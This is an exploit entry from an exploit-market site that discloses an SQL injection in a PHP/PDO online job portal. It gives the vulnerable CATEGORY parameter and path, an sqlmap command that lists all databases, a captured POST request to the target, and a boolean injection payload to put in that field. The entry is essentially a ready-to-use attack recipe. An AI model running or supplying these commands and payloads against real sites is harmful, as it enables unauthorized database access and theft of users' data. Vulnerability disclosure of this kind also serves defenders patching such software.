[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Online Job Portal In PHP/PDO 1.0 SQL Injection Vulnerability

Author
Mohamed Elobeid
Risk
[
Security Risk High
]
0day-ID
0day-ID-35341
Category
web applications
Date add
01-12-2020
Platform
php
# Title: online job portal phppdo v1.0 - SQL injection
# Exploit Author: Mohamed Elobeid (0b3!d)
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13850&title=Online+Job+Portal+in+PHP%2FPDO
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
# Description
This parameter "CATEGORY" is vulnerable to  SQL injection in this path "/jobportal/index.php?q=result&searchfor=advancesearch" that leads to retrieve all databases.


#POC
1-sqlmap -r request.txt -p CATEGORY --dbs

where the request.txt is an intercept of a search request captured below:

POST /jobportal/index.php?q=result&searchfor=advancesearch HTTP/1.1

Host: 192.168.52.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.52.1/jobportal/
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Connection: close
Cookie: PHPSESSID=bb4g25d3qceicepo7b3d26cfpp
Upgrade-Insecure-Requests: 1

SEARCH=&CATEGORY=Managerial&COMPANY=Quest


2- use a proxy to intercept a search request ad change the CATEGORY field by the following:
Managerial' OR NOT 5832=5832#&COMPANY=Quest


Regards,
Mohamed ELobeid
Security Engineer, Cyber Security Operations Center
Diyar United Company

#  0day.today [2024-12-25]  #